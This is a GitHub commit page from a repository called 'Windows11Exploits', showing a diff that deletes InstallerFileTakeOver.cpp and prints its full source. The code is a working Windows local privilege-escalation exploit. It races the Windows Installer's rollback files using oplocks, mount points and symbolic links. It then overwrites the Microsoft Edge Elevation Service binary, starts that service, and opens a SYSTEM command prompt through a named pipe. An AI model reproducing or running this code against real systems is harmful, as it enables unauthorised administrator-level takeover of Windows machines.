MattTheTekie/Windows11Exploits
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Delete InstallerFileTakeOver.cpp

Browse source
This commit is contained in:
nu11secur1ty 2022-01-10 14:43:49 +02:00 committed by GitHub
commit 612e43acba
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1 changed files with 0 additions and 438 deletions
Download patch file Download diff file Expand all files Collapse all files

438
InstallerFileTakeOver/InstallerFileTakeOver.cpp
View file

@ -1,438 +0,0 @@
// InstallerFileTakeOver.cpp : This file contains the 'main' function. Program execution begins and ends there.
//
#include <iostream>
#include <windows.h>
#include <AclAPI.h>
#include <sddl.h>
#include <conio.h>
#include <strsafe.h>
#include <vector>
#include <ShlObj.h>
#include <Shlwapi.h>
#include <comdef.h>
#pragma comment(lib, "shlwapi.lib")
#include "Win-Ops-Master.h"
#include "InstallerDispatcher.h"
OpsMaster op;
WCHAR GlobalInstallDir[MAX_PATH];
HANDLE GlobalNtpdHandle = NULL;
WCHAR global_fnr[MAX_PATH];
WCHAR global_rbf_full_path[MAX_PATH];
HANDLE global_fnr_handle = NULL;
WCHAR global_msft_plz[MAX_PATH];
HANDLE global_sm_link = NULL;
HANDLE hglobal_msft_plz = NULL;
HANDLE global_new_msft_plz = NULL;
HANDLE hspl = NULL;
HANDLE htoast = NULL;
bool OplockTrigger = false;
WCHAR global_temp[MAX_PATH];
WCHAR EdgeSvcPath[MAX_PATH];
WCHAR* _GetUserSid() {
HANDLE hprocess = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION | PROCESS_QUERY_INFORMATION, FALSE, GetCurrentProcessId());
HANDLE htoken = NULL;
OpenProcessToken(hprocess, TOKEN_ALL_ACCESS, &htoken);
CloseHandle(hprocess);
DWORD dwSize;
GetTokenInformation(htoken, TokenUser, nullptr, 0, &dwSize);
std::vector<BYTE> userbuffer(dwSize);
GetTokenInformation(htoken, TokenUser, &userbuffer[0], dwSize, &dwSize);
CloseHandle(htoken);
PTOKEN_USER user = reinterpret_cast<PTOKEN_USER>(&userbuffer[0]);
LPWSTR lpUser;
if (ConvertSidToStringSid(user->User.Sid, &lpUser))
{
return lpUser;
}
return NULL;
}
bool ChangeProcessACL() {
HANDLE hprocess = OpenProcess(READ_CONTROL | WRITE_DAC | WRITE_OWNER | PROCESS_QUERY_INFORMATION, FALSE, GetCurrentProcessId());
//WCHAR string_sd[] = L"D:(A;;0x1f1ffa;;;S-1-5-21-2698539051-1299007672-586681352-1001)(A;;0x1f1ffa;;;SY)\0";
WCHAR string_sd[512] = L"D:(A;;0x1f1ffa;;;\0";
StringCchCat(string_sd, 512, _GetUserSid());
StringCchCat(string_sd, 512, L")(A;;0x1f1ffa;;;SY)\0");
PSECURITY_DESCRIPTOR in_sd = new SECURITY_DESCRIPTOR;
ULONG sd_sz = 0;
ConvertStringSecurityDescriptorToSecurityDescriptor(string_sd, SDDL_REVISION_1, &in_sd, &sd_sz);
PSECURITY_DESCRIPTOR out_sd = NULL;
DWORD absolute_sd_sz = 0;
PACL out_acl = 0;
DWORD acl_sz = 0;
PACL out_sacl = 0;
DWORD sacl_sz = 0;
DWORD owner_sz = 0;
PSID out_owner_sid = 0;
DWORD grp_sz = 0;
PSID out_grp_sid = 0;
MakeAbsoluteSD(in_sd, out_sd, &absolute_sd_sz, out_acl, &acl_sz, out_sacl, &sacl_sz,
out_owner_sid, &owner_sz, out_grp_sid, &grp_sz);
out_sd = HeapAlloc(GetProcessHeap(), HEAP_GENERATE_EXCEPTIONS | HEAP_ZERO_MEMORY, absolute_sd_sz);
out_acl = (PACL)HeapAlloc(GetProcessHeap(), HEAP_GENERATE_EXCEPTIONS | HEAP_ZERO_MEMORY, acl_sz);
out_sacl = (PACL)HeapAlloc(GetProcessHeap(), HEAP_GENERATE_EXCEPTIONS | HEAP_ZERO_MEMORY, sacl_sz);
out_owner_sid = HeapAlloc(GetProcessHeap(), HEAP_GENERATE_EXCEPTIONS | HEAP_ZERO_MEMORY, owner_sz);
out_grp_sid = HeapAlloc(GetProcessHeap(), HEAP_GENERATE_EXCEPTIONS | HEAP_ZERO_MEMORY, grp_sz);
MakeAbsoluteSD(in_sd, out_sd, &absolute_sd_sz, out_acl, &acl_sz, out_sacl, &sacl_sz,
out_owner_sid, &owner_sz, out_grp_sid, &grp_sz);
DWORD ret = SetSecurityInfo(hprocess, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, out_acl, NULL);
HeapFree(GetProcessHeap(), NULL, out_sd);
HeapFree(GetProcessHeap(), NULL, out_acl);
HeapFree(GetProcessHeap(), NULL, out_sacl);
HeapFree(GetProcessHeap(), NULL, out_owner_sid);
HeapFree(GetProcessHeap(), NULL, out_grp_sid);
CloseHandle(hprocess);
return ret == ERROR_SUCCESS;
}
void DropFile(WCHAR* file) {
HANDLE hf = op.OpenFileNative(std::wstring(file), GENERIC_READ | GENERIC_WRITE, ALL_SHARING, CREATE_ALWAYS);
std::wstring smtg = op.GenerateRandomStr();
op.WriteFileNative(hf, (PVOID)smtg.c_str(), smtg.size() * sizeof(WCHAR), NULL);
CloseHandle(hf);
}
bool DoesEdgeSvcExist() {
SC_HANDLE scmgr = OpenSCManagerW(NULL, NULL, GENERIC_READ);
SC_HANDLE edge_svc = OpenServiceW(scmgr, L"MicrosoftEdgeElevationService", SERVICE_QUERY_CONFIG);
bool res = GetLastError() == ERROR_SERVICE_DOES_NOT_EXIST;
CloseServiceHandle(scmgr);
if (res)
return false;
CloseServiceHandle(edge_svc);
return true;
}
void PrepareGlobalInstallDir() {
WCHAR string_sd[512] = L"D:PAI(A;OICI;FA;;;SY)(A;OICI;FA;;;\0";
StringCchCat(string_sd, 512, _GetUserSid());
StringCchCat(string_sd, 512, L")(A;OICI;FA;;;BA)\0");
PSECURITY_DESCRIPTOR sd = new SECURITY_DESCRIPTOR;
ULONG sd_sz = 0;
ConvertStringSecurityDescriptorToSecurityDescriptor(string_sd, SDDL_REVISION_1, &sd, &sd_sz);
SECURITY_ATTRIBUTES sa = { sizeof(sa), sd, FALSE };
WCHAR _tmp[MAX_PATH] = L"%TEMP%\\";
StringCchCat(_tmp, MAX_PATH, op.GenerateRandomStr().c_str());
ExpandEnvironmentStrings(_tmp, GlobalInstallDir, MAX_PATH);
WCHAR ntpd[MAX_PATH];
wcscpy_s(ntpd, GlobalInstallDir);
SHCreateDirectoryEx(NULL, ntpd, &sa);
StringCchCat(ntpd, MAX_PATH, L"\\microsoft plz");
SHCreateDirectory(NULL, ntpd);
StringCchCat(ntpd, MAX_PATH, L"\\notepad.exe");
DropFile(ntpd);
WCHAR spl[MAX_PATH];
wcscpy_s(spl, GlobalInstallDir);
StringCchCat(spl, MAX_PATH, L"\\splwow64.exe");
DropFile(spl);
WCHAR apptoast[MAX_PATH];
wcscpy_s(apptoast, GlobalInstallDir);
StringCchCat(apptoast, MAX_PATH, L"\\@AppHelpToast.png");
DropFile(apptoast);
wcscpy_s(global_temp, GlobalInstallDir);
StringCchCat(global_temp, MAX_PATH, L"\\");
StringCchCat(global_temp, MAX_PATH, op.GenerateRandomStr().c_str());
CreateDirectory(global_temp, NULL);
return;
}
void LockNotepadFile() {
WCHAR ntpd[MAX_PATH];
wcscpy_s(ntpd, GlobalInstallDir);
StringCchCat(ntpd, MAX_PATH, L"\\microsoft plz\\notepad.exe");
GlobalNtpdHandle = CreateFile(ntpd, GENERIC_READ | DELETE, FILE_SHARE_READ, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL | FILE_FLAG_DELETE_ON_CLOSE, NULL);
return;
}
WCHAR* GetRbfFile(HANDLE hdir) {
FILE_NOTIFY_INFORMATION* fn;
do {
char buf[4096];
DWORD ret_sz = 0;
ReadDirectoryChangesW(hdir, buf, 4096, TRUE, FILE_NOTIFY_CHANGE_FILE_NAME, &ret_sz, NULL, NULL);
fn = (FILE_NOTIFY_INFORMATION*)buf;
if (fn->Action != FILE_ACTION_REMOVED)
continue;
size_t sz = fn->FileNameLength / sizeof(WCHAR);
fn->FileName[sz] = '\0';
} while (wcscmp(PathFindExtension(fn->FileName), L".rbf") != 0);
return fn->FileName;
}
std::wstring _BuildNativePath(std::wstring path) {
//I am considering any path that start with \ is a native path
if (path.rfind(L"\\", 0) != std::wstring::npos)
return path;
path = L"\\??\\" + path;
return path;
}
void cb_spl() {
if (OplockTrigger)
return;
OplockTrigger = true;
CloseHandle(htoast);
WCHAR ss[MAX_PATH];
wcscpy_s(ss, GlobalInstallDir);
StringCchCat(ss, MAX_PATH, L"\\");
StringCchCat(ss, MAX_PATH, op.GenerateRandomStr().c_str());
global_new_msft_plz = op.OpenDirectory(ss, GENERIC_READ | GENERIC_WRITE | DELETE, ALL_SHARING, OPEN_ALWAYS);
op.CreateMountPoint(global_new_msft_plz, L"\\BaseNamedObjects\\Restricted");
}
void cb_toast() {
if (OplockTrigger)
return;
OplockTrigger = true;
CloseHandle(hspl);
WCHAR ss[MAX_PATH];
wcscpy_s(ss, GlobalInstallDir);
StringCchCat(ss, MAX_PATH, L"\\");
StringCchCat(ss, MAX_PATH, op.GenerateRandomStr().c_str());
global_new_msft_plz = op.OpenDirectory(ss, GENERIC_READ | GENERIC_WRITE | DELETE, ALL_SHARING, OPEN_ALWAYS);
op.CreateMountPoint(global_new_msft_plz, L"\\BaseNamedObjects\\Restricted");
}
WCHAR* GetEdgeServicePath() {
static bool z = true;
if (z)
z = false;
else
return EdgeSvcPath;
if (!DoesEdgeSvcExist())
return NULL;
SC_HANDLE scmgr = OpenSCManagerW(NULL, NULL, GENERIC_READ);
SC_HANDLE edge_svc = OpenServiceW(scmgr, L"MicrosoftEdgeElevationService", SERVICE_QUERY_CONFIG);
CloseServiceHandle(scmgr);
QUERY_SERVICE_CONFIG* svc_cfg = NULL;
DWORD ndbytes = 0;
QueryServiceConfigW(edge_svc, svc_cfg, NULL, &ndbytes);
svc_cfg = (QUERY_SERVICE_CONFIG *) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY | HEAP_GENERATE_EXCEPTIONS, ndbytes);
QueryServiceConfigW(edge_svc, svc_cfg, ndbytes, &ndbytes);
WCHAR binpath[MAX_PATH];
wcscpy_s(binpath,MAX_PATH,svc_cfg->lpBinaryPathName);
HeapFree(GetProcessHeap(), NULL, svc_cfg);
CloseServiceHandle(edge_svc);
int j = 1;
for (int i = 0; i < lstrlenW(binpath) - 2; i++) {
EdgeSvcPath[i] = binpath[j];
EdgeSvcPath[i + 1] = L'\0';
j++;
}
return EdgeSvcPath;
}
HANDLE CreateSMForRbf(WCHAR* sm) {
int argc = 0;
LPWSTR* argv = CommandLineToArgvW(GetCommandLine(), &argc);
if (argc == 2) {
return op.CreateNativeSymlink(std::wstring(sm), _BuildNativePath(argv[1]));
}
return op.CreateNativeSymlink(std::wstring(sm), _BuildNativePath(GetEdgeServicePath()));
}
void cb2() {
CloseHandle(GlobalNtpdHandle);
op.MoveFileToTempDir(global_fnr_handle,USE_CUSTOM_TEMP_DIR,std::wstring(global_temp));
if (hglobal_msft_plz) {
op.MoveFileToTempDir(hglobal_msft_plz, USE_CUSTOM_TEMP_DIR, std::wstring(global_temp));
CloseHandle(hglobal_msft_plz);
}
op.MoveByHandle(global_new_msft_plz, std::wstring(global_msft_plz));
CloseHandle(global_new_msft_plz);
WCHAR sm[MAX_PATH];
wcscpy_s(sm, L"\\BaseNamedObjects\\Restricted\\");
StringCchCat(sm, MAX_PATH, global_fnr);
global_sm_link = CreateSMForRbf(sm);
}
DWORD WINAPI exp(void*) {
SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL);
wcscpy_s(global_msft_plz, GlobalInstallDir);
StringCchCat(global_msft_plz, MAX_PATH, L"\\microsoft plz");
HANDLE hdir = CreateFile(global_msft_plz, GENERIC_READ, ALL_SHARING, NULL, OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS, NULL);
WCHAR fst[MAX_PATH];
wcscpy_s(fst, GetRbfFile(hdir));
do {
wcscpy_s(global_fnr, GetRbfFile(hdir));
} while (wcscmp(fst, global_fnr) == 0);
CloseHandle(hdir);
HANDLE test;
wcscpy_s(global_rbf_full_path, GlobalInstallDir);
StringCchCat(global_rbf_full_path, MAX_PATH, L"\\microsoft plz\\");
StringCchCat(global_rbf_full_path, MAX_PATH, global_fnr);
do {
test = op.OpenFileNative(global_rbf_full_path, GENERIC_READ, NULL, CREATE_NEW);
} while (!test);
CloseHandle(test);
WCHAR spl[MAX_PATH];
WCHAR toast[MAX_PATH];
wcscpy_s(toast, GlobalInstallDir);
wcscpy_s(spl, GlobalInstallDir);
StringCchCat(toast, MAX_PATH, L"\\@AppHelpToast.png");
StringCchCat(spl, MAX_PATH, L"\\splwow64.exe");
hspl = op.OpenFileNative(spl, GENERIC_READ | GENERIC_WRITE, NULL, OPEN_ALWAYS);
htoast = op.OpenFileNative(toast, GENERIC_READ | GENERIC_WRITE, NULL, OPEN_ALWAYS);
hglobal_msft_plz = op.OpenDirectory(global_msft_plz, DELETE, ALL_SHARING, OPEN_EXISTING);
lock_ptr lk_spl = op.CreateLock(hspl, cb_spl);
lock_ptr lk_toast = op.CreateLock(htoast, cb_toast);
while (!OplockTrigger) { }// a pure waste of your precious cpu
delete lk_spl;
delete lk_toast;
global_fnr_handle = op.OpenFileNative(global_rbf_full_path, GENERIC_READ | GENERIC_WRITE | DELETE, FILE_SHARE_READ, OPEN_ALWAYS);
op.CreateAndWaitLock(global_fnr_handle, cb2);
return ERROR_SUCCESS;
}
class __declspec(uuid("4d40ca7e-d22e-4b06-abbc-4defecf695d8")) IFoo : public IUnknown {
public:
virtual HRESULT __stdcall Method();
};
_COM_SMARTPTR_TYPEDEF(IFoo, __uuidof(IFoo));
void StartElevationSvc() {
IFoo* pObject;
struct __declspec(uuid("1FCBE96C-1697-43AF-9140-2897C7C69767")) CLSID_Object;
CoInitialize(NULL);
CoCreateInstance(__uuidof(CLSID_Object), NULL, CLSCTX_LOCAL_SERVER, __uuidof(IFoo), reinterpret_cast<void**>(&pObject));
CoUninitialize();
return;
}
bool IsService() {
if (!DoesEdgeSvcExist())
return false;
WCHAR* svc_path = GetEdgeServicePath();
WCHAR current_path[MAX_PATH];
GetModuleFileName(GetModuleHandle(NULL), current_path, MAX_PATH);
if (_wcsicmp(svc_path, current_path) != 0)
return false;
return true;
}
void LaunchBroker() {
WCHAR current_path[MAX_PATH];
GetModuleFileName(GetModuleHandle(NULL), current_path, MAX_PATH);
WCHAR full_cmd[MAX_PATH] = L"\"";
StringCchCat(full_cmd, MAX_PATH, current_path);
StringCchCat(full_cmd, MAX_PATH, L"\" /svc");
STARTUPINFO si = { 0 };
PROCESS_INFORMATION pi = { 0 };
CreateProcess(current_path, full_cmd, NULL, NULL, FALSE, NULL, NULL, NULL, &si, &pi);
return;
}
bool IsBroker() {
int argc = 0;
LPWSTR* argv = CommandLineToArgvW(GetCommandLine(), &argc);
if (argc != 2)
return false;
if (_wcsicmp(argv[1], L"/svc") != 0)
return false;
return true;
}
int BrokerMain() {
HANDLE hpipe = CreateNamedPipe(L"\\\\.\\pipe\\ExploitPipe", PIPE_ACCESS_DUPLEX | FILE_FLAG_FIRST_PIPE_INSTANCE, PIPE_TYPE_BYTE | PIPE_WAIT, 1, NULL, NULL, NULL, NULL);
if (hpipe == INVALID_HANDLE_VALUE) {
return 1;
}
ConnectNamedPipe(hpipe, NULL);
ULONG sesid = 0;
GetNamedPipeClientSessionId(hpipe, &sesid);
CloseHandle(hpipe);
HANDLE hcurrentprocess = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION | SYNCHRONIZE, FALSE, GetCurrentProcessId());
HANDLE htoken = NULL;
OpenProcessToken(hcurrentprocess, TOKEN_ALL_ACCESS, &htoken);
CloseHandle(hcurrentprocess);
HANDLE hduptoken = NULL;
DuplicateTokenEx(htoken, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &hduptoken);
CloseHandle(htoken);
SetTokenInformation(hduptoken, TokenSessionId, &sesid, sizeof(sesid));
PROCESS_INFORMATION pi = { 0 };
STARTUPINFO si = { 0 };
si.cb = sizeof(si);
si.wShowWindow = SW_SHOW;
si.lpDesktop = (LPWSTR)L"WinSta0\\Default";
WCHAR comspec[MAX_PATH];
ExpandEnvironmentStrings(L"%ComSpec%", comspec, MAX_PATH);
CreateProcessAsUser(hduptoken, comspec, NULL, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi);
CloseHandle(hduptoken);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
return 0;
}
bool IsFileWriteAble(WCHAR* f) {
HANDLE hg = op.OpenFileNative(f, GENERIC_WRITE, ALL_SHARING, OPEN_EXISTING);
if (!hg)
return false;
CloseHandle(hg);
return true;
}
int wmain(int argc, wchar_t *argv[])
{
if (!DoesEdgeSvcExist() && (argc != 2)) {
wprintf(L"[#] Usage : %s C:\\File\\To\\Take\\Over", argv[0]);
return 0;
}
if (IsBroker()) {
return BrokerMain();
}
if (IsService()) {
LaunchBroker();
return 0;
}
SetPriorityClass(GetCurrentProcess(), HIGH_PRIORITY_CLASS);
ChangeProcessACL();
PrepareGlobalInstallDir();
InstallerDispatcher* dispatcher = new InstallerDispatcher;
LockNotepadFile();
DWORD tid = 0;
HANDLE hexp = CreateThread(NULL, NULL, exp, NULL, NULL, &tid);
dispatcher->RunAdminInstall(GlobalInstallDir);
WaitForSingleObject(dispatcher->InstallerDispatcherThread, INFINITE);
WaitForSingleObject(hexp, INFINITE);
CloseHandle(hexp);
CloseHandle(global_sm_link);
delete dispatcher;
if (argc != 1)
return 0;
if (!IsFileWriteAble(GetEdgeServicePath()))
return 1;
WCHAR current_path[MAX_PATH];
GetModuleFileName(GetModuleHandle(NULL), current_path, MAX_PATH);
CopyFile(current_path, GetEdgeServicePath(), FALSE);
StartElevationSvc();
HANDLE hpipe;
do {
Sleep(100);
hpipe = CreateFile(L"\\\\.\\pipe\\ExploitPipe", GENERIC_READ, ALL_SHARING, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
} while (hpipe == INVALID_HANDLE_VALUE);
CloseHandle(hpipe);
return 0;
}